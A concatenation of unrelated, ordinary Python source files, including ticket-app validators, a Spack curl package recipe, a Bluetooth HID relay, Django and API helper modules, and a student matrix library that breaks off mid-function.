print('transaction was created unsuccessfully\nplease retype\nthe quantity of the tickets has to be '
'more than 0, and less than or equal to the available quantity')
return False
elif not (float(balance) >= price * quantity * 1.35 * 1.05):
print('transaction was created unsuccessfully\nplease retype\nyour balance is insufficient')
return False
return True
'''
this function will take an string of user email as input, and True or False as output
it will check if the format of email is correct
'''
def check_register_email(register_email):
# if the format of input email is not as follows, return false
if re.match("^.+\\@(\\[?)[a-zA-Z0-9\\-\\.]+\\.([a-zA-Z]{2,3}|[0-9]{1,3})(\\]?)$", register_email) is None:
print("email format is incorrect\n")
return False
return True
'''
this function will take an string of user email as input, and True or False as output
it will check if the email is already exits
'''
def check_exits_email(register_email):
accReader = csv.reader(open('accounts.csv', 'r')) # read the file
# if input email already exits, return False
for i in accReader:
if not i:
continue
elif register_email == i[0]:
print("account exits\n")
return False
return True
'''
this function will take an string of user name as input, and True or False as output
it will check if the format of user name is correct
'''
def check_register_name(register_name):
# name can only be alphanumerical
if not (register_name.isalnum() or ' ' in register_name):
print('user name format is incorrect (User name should be alphanumeric-only)\n')
return False
# space allowed only if it's not the first and last character
if (register_name[0] == ' ' or register_name[len(register_name) - 1] == ' '):
print('user name format is incorrect (Space allowed only if it is not the first or the last character)\n')
return False
# length of name should be longer than 2 and shorter than 20
elif len(register_name) >= 20 or len(register_name) <= 2 :
print('user name format is incorrect (User name should be longer than 2 and shorter that 20 characters)\n')
return False
return True
'''
this function will take an string of user password as input, and True or False as output
it will check if the format of user password is correct
'''
def check_register_password(register_password):
# if the format of input password is not as follows, return false
# at least one upper and one lower case with special characters, minimum 6 in length
#pattern = r'^(?![A-Za-z0-9]+$)(?![a-z0-9\\W]+$)(?![A-Za-z\\W]+$)(?![A-Z0-9\\W]+$)^.{6,}$'
pattern = '^(?=.*[a-z])(?=.*[A-Z])(?=.*[-+_!@#$%^&*., ?])^.{6,}$'
# Compile the ReGex
res = re.compile(pattern)
if re.search(res, register_password):
return True
print('password format is incorrect\n')
return False
'''
this function will take two string of user password as input, and True or False as output
it will check if two input are the same
'''
def check_register_password2(register_password, register_password2):
if register_password == register_password2:
return True
print("two password doesn't match, please confirm your password\n")
return False
if __name__ == "__main__":
main()
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
import sys
from spack import *
class Curl(AutotoolsPackage):
"""cURL is an open source command line tool and library for
transferring data with URL syntax"""
homepage = "https://curl.se/"
# URL must remain http:// so Spack can bootstrap curl
url = "http://curl.haxx.se/download/curl-7.78.0.tar.bz2"
executables = ['^curl$']
version('7.81.0', sha256='1e7a38d7018ec060f1f16df839854f0889e94e122c4cfa5d3a37c2dc56f1e258')
version('7.80.0', sha256='dd0d150e49cd950aff35e16b628edf04927f0289df42883750cf952bb858189c')
version('7.79.1', sha256='de62c4ab9a9316393962e8b94777a570bb9f71feb580fb4475e412f2f9387851')
version('7.79.0', sha256='d607a677f473f79f96c964100327125a6204a39d835dc00dab7fc0129b959f42')
version('7.78.0', sha256='98530b317dc95ccb324bbe4f834f07bb642fbc393b794ddf3434f246a71ea44a')
version('7.77.0', sha256='6c0c28868cb82593859fc43b9c8fdb769314c855c05cf1b56b023acf855df8ea')
version('7.76.1', sha256='7a8e184d7d31312c4ebf6a8cb59cd757e61b2b2833a9ed4f9bf708066e7695e9')
version('7.76.0', sha256='e29bfe3633701590d75b0071bbb649ee5ca4ca73f00649268bd389639531c49a')
version('7.75.0', sha256='50552d4501c178e4cc68baaecc487f466a3d6d19bbf4e50a01869effb316d026')
version('7.74.0', sha256='0f4d63e6681636539dc88fa8e929f934cd3a840c46e0bf28c73be11e521b77a5')
version('7.73.0', sha256='cf34fe0b07b800f1c01a499a6e8b2af548f6d0e044dca4a29d88a4bee146d131')
version('7.72.0', sha256='ad91970864102a59765e20ce16216efc9d6ad381471f7accceceab7d905703ef')
version('7.71.0', sha256='600f00ac2481a89548a4141ddf983fd9386165e1960bac91d0a1c81dca5dd341')
version('7.68.0', sha256='207f54917dd6a2dc733065ccf18d61bb5bebeaceb5df49cd9445483e8623eeb9')
version('7.64.0', sha256='d573ba1c2d1cf9d8533fadcce480d778417964e8d04ccddcc76e591d544cf2eb')
version('7.63.0', sha256='9bab7ed4ecff77020a312d84cc5fb7eb02d58419d218f267477a724a17fd8dd8')
version('7.60.0', sha256='897dfb2204bd99be328279f88f55b7c61592216b0542fcbe995c60aa92871e9b')
version('7.59.0', sha256='b5920ffd6a8c95585fb95070e0ced38322790cb335c39d0dab852d12e157b5a0')
version('7.56.0', sha256='de60a4725a3d461c70aa571d7d69c788f1816d9d1a8a2ef05f864ce8f01279df')
version('7.54.0', sha256='f50ebaf43c507fa7cc32be4b8108fa8bbd0f5022e90794388f3c7694a302ff06')
version('7.53.1', sha256='1c7207c06d75e9136a944a2e0528337ce76f15b9ec9ae4bb30d703b59bf530e8')
version('7.52.1', sha256='d16185a767cb2c1ba3d5b9096ec54e5ec198b213f45864a38b3bda4bbf87389b')
version('7.50.3', sha256='7b7347d976661d02c84a1f4d6daf40dee377efdc45b9e2c77dedb8acf140d8ec')
version('7.50.2', sha256='0c72105df4e9575d68bcf43aea1751056c1d29b1040df6194a49c5ac08f8e233')
version('7.50.1', sha256='3c12c5f54ccaa1d40abc65d672107dcc75d3e1fcb38c267484334280096e5156')
version('7.49.1', sha256='eb63cec4bef692eab9db459033f409533e6d10e20942f4b060b32819e81885f1')
version('7.47.1', sha256='ddc643ab9382e24bbe4747d43df189a0a6ce38fcb33df041b9cb0b3cd47ae98f')
version('7.46.0', sha256='b7d726cdd8ed4b6db0fa1b474a3c59ebbbe4dcd4c61ac5e7ade0e0270d3195ad')
version('7.45.0', sha256='65154e66b9f8a442b57c436904639507b4ac37ec13d6f8a48248f1b4012b98ea')
version('7.44.0', sha256='1e2541bae6582bb697c0fbae49e1d3e6fad5d05d5aa80dbd6f072e0a44341814')
version('7.43.0', sha256='baa654a1122530483ccc1c58cc112fec3724a82c11c6a389f1e6a37dc8858df9')
version('7.42.1', sha256='e2905973391ec2dfd7743a8034ad10eeb58dab8b3a297e7892a41a7999cac887')
default_tls = 'openssl'
if sys.platform == 'darwin':
default_tls = 'secure_transport'
# TODO: add dependencies for other possible TLS backends
values_tls = [
# 'amissl',
# 'bearssl',
'gnutls',
'mbedtls',
# 'mesalink',
'nss',
'openssl',
# 'rustls',
# 'schannel',
'secure_transport',
# 'wolfssl',
]
variant('tls', default=default_tls, description='TLS backend', values=values_tls, multi=True)
variant('nghttp2', default=False, description='build nghttp2 library (requires C++11)')
variant('libssh2', default=False, description='enable libssh2 support')
variant('libssh', default=False, description='enable libssh support') # , when='7.58:')
variant('gssapi', default=False, description='enable Kerberos support')
variant('librtmp', default=False, description='enable Rtmp support')
variant('ldap', default=False, description='enable ldap support')
variant('libidn2', default=False, description='enable libidn2 support')
conflicts('+libssh', when='@:7.57')
# on OSX and --with-ssh the configure steps fails with
# one or more libs available at link-time are not available run-time
# unless the libssh are installed externally (e.g. via homebrew), even
# though spack isn't supposed to know about such a libssh installation.
# C.f. https://github.com/spack/spack/issues/7777
conflicts('platform=darwin', when='+libssh2')
conflicts('platform=darwin', when='+libssh')
conflicts('platform=cray', when='tls=secure_transport', msg='Only supported on macOS')
conflicts('platform=linux', when='tls=secure_transport', msg='Only supported on macOS')
conflicts('tls=mbedtls', when='@:7.45')
depends_on('gnutls', when='tls=gnutls')
depends_on('mbedtls@3:', when='@7.79: tls=mbedtls')
depends_on('mbedtls@:2', when='@:7.78 tls=mbedtls')
depends_on('nss', when='tls=nss')
depends_on('openssl', when='tls=openssl')
depends_on('libidn2', when='+libidn2')
depends_on('zlib')
depends_on('nghttp2', when='+nghttp2')
depends_on('libssh2', when='+libssh2')
depends_on('libssh', when='+libssh')
depends_on('krb5', when='+gssapi')
# curl queries pkgconfig for openssl compilation flags
depends_on('pkgconfig', type='build')
@classmethod
def determine_version(cls, exe):
curl = Executable(exe)
output = curl('--version', output=str, error=str)
match = re.match(r'curl ([\d.]+)', output)
return match.group(1) if match else None
@classmethod
def determine_variants(cls, exes, version):
for exe in exes:
variants = ''
curl = Executable(exe)
output = curl('--version', output=str, error='str')
if 'nghttp2' in output:
variants += '+nghttp2'
protocols_match = re.search(r'Protocols: (.*)\n', output)
if protocols_match:
protocols = protocols_match.group(1).strip().split(' ')
if 'ldap' in protocols:
variants += '+ldap'
features_match = re.search(r'Features: (.*)\n', output)
if features_match:
features = features_match.group(1).strip().split(' ')
if 'GSS-API' in features:
variants += '+gssapi'
# TODO: Determine TLS backend if needed.
# TODO: Determine more variants.
return variants
def configure_args(self):
spec = self.spec
args = [
'--with-zlib=' + spec['zlib'].prefix,
# Prevent unintentional linking against system libraries: we could
# add variants for these in the future
'--without-brotli',
'--without-libgsasl',
'--without-libpsl',
'--without-zstd',
]
# Make gnutls / openssl decide what certs are trusted.
# TODO: certs for other tls options.
if spec.satisfies('tls=gnutls') or spec.satisfies('tls=openssl'):
args.extend([
'--without-ca-bundle',
'--without-ca-path',
'--with-ca-fallback',
])
# https://daniel.haxx.se/blog/2021/06/07/bye-bye-metalink-in-curl/
# We always disable it explicitly, but the flag is gone in newer
# versions.
if spec.satisfies('@:7.77'):
args.append('--without-libmetalink')
if spec.satisfies('+gssapi'):
args.append('--with-gssapi=' + spec['krb5'].prefix)
else:
args.append('--without-gssapi')
args += self.with_or_without('tls')
args += self.with_or_without('libidn2', 'prefix')
args += self.with_or_without('librtmp')
args += self.with_or_without('nghttp2')
args += self.with_or_without('libssh2')
args += self.with_or_without('libssh')
args += self.enable_or_disable('ldap')
return args
def with_or_without_gnutls(self, activated):
if activated:
return '--with-gnutls=' + self.spec['gnutls'].prefix
else:
return '--without-gnutls'
def with_or_without_mbedtls(self, activated):
if self.spec.satisfies('@7.46:'):
if activated:
return '--with-mbedtls=' + self.spec['mbedtls'].prefix
else:
return '--without-mbedtls'
def with_or_without_nss(self, activated):
if activated:
return '--with-nss=' + self.spec['nss'].prefix
else:
return '--without-nss'
def with_or_without_openssl(self, activated):
if self.spec.satisfies('@7.77:'):
if activated:
return '--with-openssl=' + self.spec['openssl'].prefix
else:
return '--without-openssl'
else:
if activated:
return '--with-ssl=' + self.spec['openssl'].prefix
else:
return '--without-ssl'
def with_or_without_secure_transport(self, activated):
if self.spec.satisfies('@7.65:'):
if activated:
return '--with-secure-transport'
else:
return '--without-secure-transport'
else:
if activated:
return '--with-darwinssl'
else:
return '--without-darwinssl'
|
# Copyright (c) 2020 ruundii. All rights reserved.
import asyncio
import socket
import os
from typing import Awaitable, Callable, Dict, List, Optional, TYPE_CHECKING
from dasbus.connection import SystemMessageBus
if TYPE_CHECKING:
from hid_devices import HIDDeviceRegistry
OBJECT_MANAGER_INTERFACE = 'org.freedesktop.DBus.ObjectManager'
DEVICE_INTERFACE = 'org.bluez.Device1'
PROPERTIES_INTERFACE = 'org.freedesktop.DBus.Properties'
INPUT_DEVICE_INTERFACE = 'org.bluez.Input1'
INPUT_HOST_INTERFACE = 'org.bluez.InputHost1'
IGNORE_INPUT_DEVICES = True
class BluetoothDevice:
def __init__(self, bus: SystemMessageBus, loop: asyncio.AbstractEventLoop,
device_registry: "BluetoothDeviceRegistry", object_path: str,
is_host: bool, control_socket_path: str, interrupt_socket_path: str):
self.device = bus.get_proxy(service_name="org.bluez", object_path=object_path, interface_name=DEVICE_INTERFACE)
self.props = bus.get_proxy(service_name="org.bluez", object_path=object_path, interface_name=PROPERTIES_INTERFACE)
self.props.PropertiesChanged.connect(self.device_connected_state_changed)
self.bus = bus
self.loop = loop
self.device_registry = device_registry
self.object_path = object_path
self.is_host = is_host
self.control_socket_path: Optional[str] = control_socket_path
self.control_socket: Optional[socket.socket] = None
self.interrupt_socket_path: Optional[str] = interrupt_socket_path
self.interrupt_socket: Optional[socket.socket] = None
self.sockets_connected = False
print("BT Device ",object_path," created")
asyncio.run_coroutine_threadsafe(self.reconcile_connected_state(1), loop=self.loop)
async def reconcile_connected_state(self, delay: int) -> None:
await asyncio.sleep(delay)
try:
if self.connected and not self.sockets_connected:
await self.connect_sockets()
elif not self.connected and self.sockets_connected:
self.disconnect_sockets()
except Exception as exc:
print("Possibly dbus error during reconcile_connected_state ",exc)
async def connect_sockets(self) -> None:
if self.sockets_connected or self.control_socket_path is None or self.interrupt_socket_path is None:
return
print("Connecting sockets for ",self.object_path)
if not self.connected:
print("BT Device is not connected. No point connecting sockets. Skipping.")
try:
self.control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
self.control_socket.connect(self.control_socket_path)
self.control_socket.setblocking(False)
self.interrupt_socket = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
self.interrupt_socket.connect(self.interrupt_socket_path)
self.interrupt_socket.setblocking(False)
self.sockets_connected = True
if(self.is_host):
self.device_registry.connected_hosts.append(self)
addr = self.object_path[-17:].replace("_",":")
asyncio.create_task(self.device_registry.switch_to_master(addr))
else:
self.device_registry.connected_devices.append(self)
print("Connected sockets for ",self.object_path)
asyncio.run_coroutine_threadsafe(self.loop_of_fun(True), loop=self.loop)
asyncio.run_coroutine_threadsafe(self.loop_of_fun(False), loop=self.loop)
except Exception as err:
print("Error while connecting sockets for ",self.object_path,". Will retry in a sec", err)
try:
if self.control_socket is not None:
self.control_socket.close()
if self.interrupt_socket is not None:
self.interrupt_socket.close()
except:
pass
await asyncio.sleep(1)
asyncio.run_coroutine_threadsafe(self.connect_sockets(), loop=self.loop)
def disconnect_sockets(self) -> None:
if self.control_socket is not None:
self.control_socket.close()
self.control_socket = None
if self.interrupt_socket is not None:
self.interrupt_socket.close()
self.interrupt_socket = None
if(self.is_host and self in self.device_registry.connected_hosts):
self.device_registry.connected_hosts.remove(self)
elif self in self.device_registry.connected_devices:
self.device_registry.connected_devices.remove(self)
self.sockets_connected = False
print("Disconnected sockets for ",self.object_path)
async def loop_of_fun(self, is_ctrl: bool) -> None:
sock = self.control_socket if is_ctrl else self.interrupt_socket
while sock is not None:
try:
msg = await self.loop.sock_recv(sock,255)
except Exception:
print("Cannot read data from socket. ", self.object_path ,"Closing sockets")
if self is not None:
try:
self.disconnect_sockets()
except:
print("Error while disconnecting sockets")
print("Arranging reconnect")
asyncio.run_coroutine_threadsafe(self.reconcile_connected_state(1), loop=self.loop)
break
if msg is None or len(msg)==0:
continue
self.device_registry.send_message(msg, not self.is_host, is_ctrl)
sock = self.control_socket if is_ctrl else self.interrupt_socket
@property
def name(self) -> str:
return self.device.Name
@property
def alias(self) -> str:
return self.device.Alias
@property
def connected(self) -> bool:
return self.device.Connected
def __eq__(self, other: object) -> bool:
if isinstance(other, BluetoothDevice):
return self.object_path == other.object_path
return False
def device_connected_state_changed(self, _arg1: object, _arg2: object, _arg3: object) -> None:
print("device_connected_state_changed")
asyncio.run_coroutine_threadsafe(self.reconcile_connected_state(1), loop=self.loop)
if self.device_registry.on_devices_changed_handler is not None:
asyncio.run_coroutine_threadsafe(self.device_registry.on_devices_changed_handler(), loop=self.loop)
def finalise(self) -> None:
self.props.PropertiesChanged.disconnect(self.device_connected_state_changed)
self.control_socket_path = None
self.interrupt_socket_path = None
# Close sockets
self.disconnect_sockets()
print("BT Device ",self.object_path," finalised")
def __del__(self) -> None:
print("BT Device ",self.object_path," removed")
class BluetoothDeviceRegistry:
def __init__(self, bus: SystemMessageBus, loop: asyncio.AbstractEventLoop):
self.bus = bus
self.loop = loop
self.all: Dict[str, BluetoothDevice] = {}
self.connected_hosts: List[BluetoothDevice] = []
self.connected_devices: List[BluetoothDevice] = []
self.on_devices_changed_handler: Optional[Callable[[], Awaitable[None]]] = None
self.hid_devices: Optional["HIDDeviceRegistry"] = None
self.current_host_index = 0
def set_hid_devices(self, hid_devices: "HIDDeviceRegistry") -> None:
self.hid_devices = hid_devices
def set_on_devices_changed_handler(self, handler: Callable[[], Awaitable[None]]) -> None:
self.on_devices_changed_handler = handler
def add_devices(self) -> None:
print("Adding all BT devices")
om = self.bus.get_proxy(service_name= "org.bluez", object_path="/", interface_name=OBJECT_MANAGER_INTERFACE)
objs = om.GetManagedObjects()
for obj in list(objs):
if INPUT_HOST_INTERFACE in objs[obj]:
self.add_device(obj, True)
elif INPUT_DEVICE_INTERFACE in objs[obj]:
self.add_device(obj, False)
def add_device(self, device_object_path: str, is_host: bool) -> None:
if(IGNORE_INPUT_DEVICES and not is_host): return
if device_object_path in self.all:
print("Device ", device_object_path, " already exist. Cannot add. Skipping.")
return
#ensure master role for this connection, otherwise latency of sending packets to hosts may get pretty bad
asyncio.ensure_future(self.switch_to_master(device_object_path[-17:].replace("_",":")))
p = self.bus.get_proxy(service_name="org.bluez", object_path=device_object_path, interface_name=INPUT_HOST_INTERFACE if is_host else INPUT_DEVICE_INTERFACE)
device = BluetoothDevice(self.bus, self.loop, self, device_object_path, is_host, p.SocketPathCtrl, p.SocketPathIntr)
self.all[device_object_path] = device
async def switch_to_master(self, device_address: str) -> None:
print("switch to master called for ", device_address)
while self.is_slave(device_address):
try:
success = os.system("sudo hcitool sr " + device_address + " MASTER") == 0
print("hcitool ",device_address," success:",success)
except Exception as exc:
print("hcitool ",device_address," exception:",exc)
await asyncio.sleep(5)
def is_slave(self, device_address: str) -> bool:
with os.popen('sudo hcitool con') as stream:
return any("SLAVE" in l and device_address in l for l in stream.readlines())
def remove_devices(self) -> None:
print("Removing all BT devices")
while len(self.all) >0:
self.remove_device(list(self.all)[0])
def remove_device(self, device_object_path: str) -> None:
if device_object_path not in self.all:
return # No such device
device = self.all[device_object_path]
del self.all[device_object_path]
list = self.connected_hosts if device.is_host else self.connected_devices
if device in list:
list.remove(device)
device.finalise()
del device
def switch_host(self) -> None:
self.current_host_index = (self.current_host_index + 1) % len(self.connected_hosts)
def __get_current_host_as_list(self) -> List[BluetoothDevice]:
if len(self.connected_hosts) <= self.current_host_index:
return []
return [self.connected_hosts[self.current_host_index]]
def send_message(self, msg: bytes, send_to_hosts: bool, is_control_channel: bool) -> None:
if IGNORE_INPUT_DEVICES and not send_to_hosts and not is_control_channel and self.hid_devices is not None:
asyncio.run_coroutine_threadsafe(self.hid_devices.send_message_to_devices(msg), loop=self.loop)
return
targets: List[BluetoothDevice] = self.__get_current_host_as_list() if send_to_hosts else self.connected_devices
for target in list(targets):
try:
socket = target.control_socket if is_control_channel else target.interrupt_socket
if socket is not None:
socket.sendall(msg)
except Exception:
print("Cannot send data to socket of ",target.object_path,". Closing")
if target is not None:
try:
target.disconnect_sockets()
except:
print("Error while trying to disconnect sockets")
asyncio.run_coroutine_threadsafe(target.reconcile_connected_state(1), loop=self.loop)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django.apps import apps
from django.conf import settings
from django.template import loader
from django.utils.encoding import force_text
from django.utils.translation import activate, deactivate
from . import js_choices_settings as default_settings
from . import rjsmin
def prepare_choices(choices):
new_choices = []
for choice in choices:
if len(choice) != 2:
continue
try:
json.dumps(choice[0])
new_choices.append((choice[0], force_text(choice[1])))
except TypeError:
new_choices.append((force_text(choice[0]), force_text(choice[1])))
return new_choices
def generate_js(locale=None):
raw_choices = []
named_choices = {}
conflicting_names = set()
if locale:
activate(locale)
for app_config in apps.get_app_configs():
for model in app_config.get_models():
for field in model._meta.get_fields():
try:
choices = [x for x in getattr(field, "flatchoices", [])]
assert len(choices)
except Exception:
continue
short_name = field.name
medium_name = "{}_{}".format(model._meta.model_name.lower(), field.name)
full_name = "{}_{}".format(model._meta.label_lower.replace(".", "_"), field.name)
value = json.dumps(prepare_choices(choices))
try:
index = raw_choices.index(value)
except ValueError:
index = len(raw_choices)
raw_choices.append(value)
for name in [short_name, medium_name, full_name]:
if name not in named_choices:
named_choices[name] = index
elif raw_choices[named_choices[name]] != value:
conflicting_names.add(name)
for name in conflicting_names:
del named_choices[name]
if locale:
deactivate()
js_var_name = getattr(settings, "JS_CHOICES_JS_VAR_NAME", default_settings.JS_VAR_NAME)
js_global_object_name = getattr(
settings, "JS_CHOICES_JS_GLOBAL_OBJECT_NAME", default_settings.JS_GLOBAL_OBJECT_NAME
)
minfiy = getattr(settings, "JS_CHOICES_JS_MINIFY", default_settings.JS_MINIFY)
js_content = loader.render_to_string(
"django_js_choices/choices_js.tpl",
{
"raw_choices_list": raw_choices,
"named_choices": json.dumps(named_choices),
"js_var_name": js_var_name,
"js_global_object_name": js_global_object_name,
},
)
if minfiy:
js_content = rjsmin.jsmin(js_content)
return js_content
|
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
"""
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
"""
class Scenario:
"""
Class to represent scenario object
"""
def __init__(self, name, scenario_manager=None):
"""
Constructor for scenario class
"""
self.name = name
self.scenario_manager = scenario_manager
self.parameters = []
def get_scenario_parameters(self):
return self.parameters
|
from typing import Optional
import diskcache
import placekey.api
from ..utils.log import getLogger
from .common import CachedAPI, calculate_cache_key
logger = getLogger(__file__)
class PlacekeyAPI(CachedAPI):
"""API for calling placekey that checks the cache first"""
def __init__(self, api_cache: diskcache.Cache, apikey: str):
self._placekey_api = placekey.api.PlacekeyAPI(apikey)
super().__init__(api_cache)
def lookup_placekey(
self,
latitude: float,
longitude: float,
location_name: str,
street_address: str,
city: str,
region: str,
postal_code: str,
iso_country_code: str = "US",
strict_address_match: bool = False,
strict_name_match: bool = False,
) -> Optional[str]:
cache_key = calculate_cache_key(
"placekey",
[
f"{latitude:.5f}",
f"{longitude:.5f}",
location_name,
street_address,
city,
region,
postal_code,
iso_country_code,
str(strict_address_match),
str(strict_name_match),
],
)
cache_response = self.api_cache.get(cache_key)
if cache_response:
if "error" in cache_response:
return None
return cache_response.get("placekey")
response = self._placekey_api.lookup_placekey(
latitude=latitude,
longitude=longitude,
location_name=location_name,
street_address=street_address,
city=city,
region=region,
postal_code=postal_code,
iso_country_code=iso_country_code,
strict_address_match=strict_address_match,
strict_name_match=strict_name_match,
)
if not response:
return None
if "error" in response:
logger.info("Failed to add placekey because: %s", response["error"])
self.set_with_expire(cache_key, {"error": response["error"]})
return None
placekey_id = response.get("placekey")
self.set_with_expire(cache_key, {"placekey": placekey_id})
return placekey_id
|
from app.utils import exceptions
from app.utils import response_factory
from app.utils.constants import JWT_EXPIRATION_TIME
from app.utils import jwt_utils
from app.utils import decorators
|
from mrcp.panel import *
from mrcp.points import *
from mrcp.config import *
class Led(BaseElement):
def __init__(self, pos=Point(0, 0), color=LED_COLOR) -> None:
super().__init__(pos=pos, color=color)
def paint(self):
found = searchLed(self._panel, self._pos)
#print("Found", found, self)
if found != self:
# there is another wich is not self
# only the first will be painted
return
pos = self._pos.toCoords()
dwg = self._panel._dwg
cutLayer = self._panel._cLayer
ledLayer = self._panel._lLayer
color = self._color
circle = dwg.circle(center=pos, r=LED_SIZE/2, fill=color)
ledLayer.add(circle)
circle = dwg.circle(center=pos, r=LED_SIZE/2, stroke=COLOR_CUT,
stroke_width=0.2, fill="none")
cutLayer.add(circle)
circle = dwg.circle(center=pos, r=LED_SIZE/2+LED_MARGIN, stroke=COLOR_ENGRAVE,
stroke_width=0.2, fill="none")
cutLayer.add(circle)
circle = dwg.circle(center=pos, r=LED_SIZE/2, stroke="none",
stroke_width=0.2, fill="white")
self._panel._tLayer.add(circle)
return super().paint()
def searchLed(panel,pos=Point(0,0)) -> Led:
pos = pos.toCoords()
for obj in panel._paintable:
if isinstance(obj,Led):
if pos == obj._pos.toCoords():
return obj
return None |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
network config setting, will be used in train.py and eval.py
"""
from easydict import EasyDict as ed
config = ed({
"num_classes": 1000,
"batch_size": 128,
"epoch_size": 500,
"warmup_epochs": 20,
"lr_init": 0.1,
"lr_max": 0.4,
'lr_end': 1e-6,
'lr_decay_mode': 'cosine',
"momentum": 0.9,
"weight_decay": 4e-5,
"label_smooth": 0.1,
"loss_scale": 128,
"use_label_smooth": True,
"label_smooth_factor": 0.1,
"save_checkpoint": True,
"save_checkpoint_epochs": 20,
"keep_checkpoint_max": 10,
"save_checkpoint_path": "./",
})
|
# Copyright (c) 2019 Thomas Howe
from typing import List, Union
from problem_sets.static.data import data_manager
from problem_sets.static.data.sqlite.test import sqlite_test_util
def clean_start(tables: Union[str, List[str]]):
sqlite_test_util.clean_start(tables)
data_manager.initialize() |
def limpar():
'''==>> Limpa o Terminal.'''
import os
os.system('cls') or None
def leiaInt(txt):
ok = False
valor = 0
while True:
num = input(txt)
if num.isnumeric():
valor = int(num)
ok = True
else:
print('\033[1;31mERRO. Digite um número inteiro válido.\033[m')
if ok:
break
return valor
def fatorial(num, show=False):
"""--> Calcula o fatorial de um número.
num: número a ser calculado
show: (opcional) Mostrar ou não a conta.
"""
if show == False:
fat = 1
n = num
while num >= 1:
fat = fat*num
num -= 1
print(f'Fatorial de {n}: {fat}')
else:
print(f'{num}! = ',end='')
fat = 1
while num >= 1:
fat *= num
print(f'{num}', end=' ')
print('x' if num > 1 else '=', end=' ')
num -= 1
print(fat)
|
biscuits_per_worker = int(input())
workers = int(input())
competetor_biscuits = int(input())
production_for_month = 0
daily_production = biscuits_per_worker * workers
production_for_month += daily_production * 20
for i in range(0, 10):
production_for_month += int((biscuits_per_worker * workers) * 0.75)
print(f"You have produced {int(production_for_month)} biscuits for the past month.")
if production_for_month > competetor_biscuits:
percentage = ((production_for_month - competetor_biscuits) / competetor_biscuits) * 100
print(f"You produce {percentage:.2f} percent more biscuits.")
elif production_for_month < competetor_biscuits:
percentage = ((competetor_biscuits - production_for_month) / competetor_biscuits) * 100
print(f"You produce {(percentage):.2f} percent less biscuits.")
|
#!/bin/python
import boto
from boto.sqs.message import RawMessage
import json
import os
import sys
data = {
"project": os.environ["CIRCLE_PROJECT_REPONAME"],
"sha": os.environ["CIRCLE_SHA1"][:7]
}
branch = os.environ["CIRCLE_BRANCH"]
if branch == "release":
queue_name = os.environ["SQS_NAME_PROD"]
elif branch == "master":
queue_name = os.environ["SQS_NAME_STAGING"]
else:
sys.exit(0)
sqs = boto.connect_sqs()
q = sqs.create_queue(queue_name)
m = RawMessage()
m.set_body(json.dumps(data))
q.write(m)
|
#!/usr/bin/env python3
from csv import DictReader
def parse_weather(file_: str):
with open(file_, 'r') as f:
reader = DictReader(f)
for row in reader:
print(row['SiteName'],row['Temperature'],row['Weather'])
if __name__ == '__main__':
parse_weather('weather.csv')
|
################################ A Library of Functions ##################################
##################################################################################################
#simple function which displays a matrix
def matrixDisplay(M):
for i in range(len(M)):
for j in range(len(M[i])):
print((M[i][j]), end = " ")
print()
##################################################################################################
#matrix product
def matrixProduct(L, M):
if len(L[0]) != len(M): #ensuring the plausiblity
print("Matrix multiplication not possible.")
else:
print("Multiplying the two matrices: ")
P=[[0 for i in range(len(M[0]))] for j in range(len(L))] #initializing empty matrix
for i in range(len(L)): #iterating rows
for j in range(len(M[0])): #iterating columns
for k in range(len(M)): #iterating elements and substituing them
P[i][j] = P[i][j] + (L[i][k] * M[k][j])
matrixDisplay(P)
##################################################################################################
#the gauss-jordan elimination code
def gaussj(a, b):
n = len(b) #defining the range through which the loops will run
for k in range(n): #loop to index pivot rows and eliminated columns
#partial pivoting
if abs(a[k][k]) < 1.0e-12:
for i in range(k+1, n):
if abs(a[i][k]) > abs(a[k][k]):
for j in range(k, n):
a[k][j], a[i][j] = a[i][j], a[k][j] #swapping of rows
b[k], b[i] = b[i], b[k]
break
#division of the pivot row
pivot = a[k][k]
if pivot == 0:
print("There is no unique solution to this system of equations.")
return
for j in range(k, n): #index of columns of the pivot row
a[k][j] /= pivot
b[k] /= pivot
#elimination loop
for i in range(n): #index of subtracted rows
if i == k or a[i][k] == 0: continue
factor = a[i][k]
for j in range(k, n): #index of columns for subtraction
a[i][j] -= factor * a[k][j]
b[i] -= factor * b[k]
print(b)
#################################################################################################
#calculation of determinant using gauss-jordan elimination
def determinant(a):
n = len(a) #defining the range through which the loops will run
if n != len(a[0]): #checking if determinant is possible to calculate
print("The matrix must be a square matrix.")
else:
s = 0
#code to obtain row echelon matrix using partial pivoting
for k in range(n-1):
if abs(a[k][k]) < 1.0e-12:
for i in range(k+1, n):
if abs(a[i][k]) > abs(a[k][k]):
for j in range(k, n):
a[k][j], a[i][j] = a[i][j], a[k][j] #swapping
s = s + 1 #counting the number of swaps happened
for i in range(k+1, n):
if a[i][k] == 0: continue
factor = a[i][k]/a[k][k]
for j in range(k, n):
a[i][j] = a[i][j] - factor * a[k][j]
d = 1
for i in range(len(a)):
d = d * a[i][i] #enlisting the diagonal elements
d = d*(-1)**s
print(d)
#################################################################################################
#calculating inverse
def inverse(a):
n = len(a) #defining the range through which loops will run
#constructing the n X 2n augmented matrix
P = [[0.0 for i in range(len(a))] for j in range(len(a))]
for i in range(3):
for j in range(3):
P[j][j] = 1.0
for i in range(len(a)):
a[i].extend(P[i])
#main loop for gaussian elimination begins here
for k in range(n):
if abs(a[k][k]) < 1.0e-12:
for i in range(k+1, n):
